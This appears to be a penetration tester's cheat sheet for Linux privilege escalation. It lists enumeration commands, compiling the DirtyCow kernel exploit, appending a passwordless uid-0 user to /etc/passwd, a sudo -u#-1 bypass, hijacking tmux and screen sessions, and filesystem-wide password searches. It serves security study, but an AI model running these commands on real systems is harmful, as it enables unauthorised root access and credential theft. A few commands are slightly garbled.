Linux Privilege Escalation
2024-03-05 21:04:27

Basic Manual Enumeration

Enumerating Users

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
whoami
id
cat /etc/passwd

#Info about me
id || (whoami && groups) 2>/dev/null
#List all users
cat /etc/passwd | cut -d: -f1
#List users with console
cat /etc/passwd | grep "sh$"
#List superusers
awk -F: '($3 == "0") {print}' /etc/passwd
#Currently logged users
w
#Login history
last | tail
#Last log of each user
lastlog

#List all users and their groups
for i in $(cut -d":" -f1 /etc/passwd 2>/dev/null);do id $i;done 2>/dev/null | sort
#Current user PGP keys
gpg --list-keys 2>/dev/null

Check Password Policy

1
grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs

Enumerating Environment

1
2
3
4
5
6
7
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set

Check Clipboard

1
2
3
4
5
6
7
8
if [ `which xclip 2>/dev/null` ]; then
    echo "Clipboard: "`xclip -o -selection clipboard 2>/dev/null`
    echo "Highlighted text: "`xclip -o 2>/dev/null`
  elif [ `which xsel 2>/dev/null` ]; then
    echo "Clipboard: "`xsel -ob 2>/dev/null`
    echo "Highlighted text: "`xsel -o 2>/dev/null`
  else echo "Not found xsel and xclip"
  fi

Enumerating Hostname

1
hostname

Enumerating System

1
2
3
4
5
6
7
uname -a
cat /etc/issue
cat /proc/version
cat /etc/*-release
(cat /proc/version || uname -a ) 2>/dev/null
lsb_release -a 2>/dev/null # old, not by default on many systems
cat /etc/os-release 2>/dev/null # universal on modern systems

Enumerating Processes and Services

1
2
3
4
5
6
7
8
9
# List running processes
ps aux --forest  

# List network connections
netstat -ano
ss -antlp

# List packages
dpkg -l

Enumerating Network

1
2
3
4
ip a
ifconfig
route print
netstat -ie

Enumerating Scheduled Tasks

1
2
3
4
5
ls -la /etc/cron*
cat /etc/crontab
crontab -l
ls -al /etc/cron* /etc/at*
cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v "^#"

Enumerating Mountables

1
2
3
cat /etc/fstab
mount
lsblk

Kernel Exploits

1
2
3
cat /proc/version
uname -a
searchsploit "Linux Kernel"

To extract all kernel exploits on the web:

1
curl https://raw.githubusercontent.com/lucyoa/kernel-exploits/master/README.md 2>/dev/null | grep "Kernels: " | cut -d ":" -f 2 | cut -d "<" -f 1 | tr -d "," | tr ' ' '\n' | grep -v "^\d\.\d$" | sort -u -r | tr '\n' ' '

DirtyCow

Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8

1
2
3
4
5
# make dirtycow stable
echo 0 > /proc/sys/vm/dirty_writeback_centisecs
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
https://github.com/evait-security/ClickNRoot/blob/master/1/exploit.c

File Permissions

Writable

1
2
3
4
find / -writable -type f 2>/dev/null

find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' 2>/dev/null | grep -v '/proc/' | grep -v $HOME | sort | uniq #Find files owned by the user or writable by anybody
for g in `groups`; do find \( -type f -or -type d \) -group $g -perm -g=w 2>/dev/null | grep -v '/proc/' | grep -v $HOME; done #Find files writable by any group of the user

Writable /etc/passwd

1
2
3
4
5
6
openssl passwd -1 <passwd>
openssl passwd -1 -salt hacker hacker
mkpasswd -m SHA-512 hacker
python2 -c 'import crypt; print crypt.crypt("hacker", "$6$salt")'

hacker:GENERATED_PASSWORD_HERE:0:0:Hacker:/root:/bin/bash

Eg. hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash

OR add one without password

1
echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd

SUID Binaries

1
2
find / -type f -perm -u=s 2>/dev/null
find / -perm -4000 2>/dev/null

SUDO

Intended Functionality

1
2
cat /etc/sudoers
sudo -l

After identifying which binaries we can run as SUDO, we can try using https://gtfobins.github.io/ to see if we can escalate our privileges

Version

Check vulnerable sudo versions

1
sudo -V | grep "Sudo ver" | grep "1\.[01234567]\.[0-9]\+\|1\.8\.1[0-9]\*\|1\.8\.2[01234567]"

SUDO < v1.28

1
sudo -u#-1 /bin/bash

Automated Enumeration

LinPeas

A bash script ran on the local machine

https://github.com/carlospolop/PEASS-ng/releases/download/refs%2Fpull%2F260%2Fmerge/linpeas.sh

Unix-Priv-Esc-Check

On Kali, the script is located at

1
/usr/share/unix-privesc-check/unix-privesc-check

Standard run:

1
unix-privesc-check standard

MISC

When privilege esclating via an SUID program to run /bin/bash, remember to use the -p flag. bash will drop all privileges unless -p is specified.

Open Shell Sessions

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
screen -ls
screen -dr <session> #The -d is to detach whoever is attached to it
screen -dr 3350.foo #In the example of the image

tmux ls
ps aux | grep tmux #Search for tmux consoles not using default folder for sockets
tmux -S /tmp/dev_sess ls #List using that socket, you can start a tmux session in that socket with: tmux -S /tmp/dev_sess

tmux attach -t myname #If you write something in this session it will appears in the other opened one
tmux attach -d -t myname #First detach the session from the other console and then access it yourself

ls -la /tmp/dev_sess #Check who can access it
rw-rw---- 1 root devs 0 Sep  1 06:27 /tmp/dev_sess #In this case root and devs can
# If you are root or devs you can access it
tmux -S /tmp/dev_sess attach -t 0 #Attach using a non-default tmux socket

Getting Desperate

Find any files with “pass” in them

1
2
3
grep --color=auto-R -i "pass" --color=always 2> (grep -v 'Permission denied' >&2)
grep --color=auto -rnw '/' -ie "PASS" --color=always 2> /dev/null
find . -type f -exec grep -i -I "PASS" {} /dev/null \;
2024-03-05 21:04:27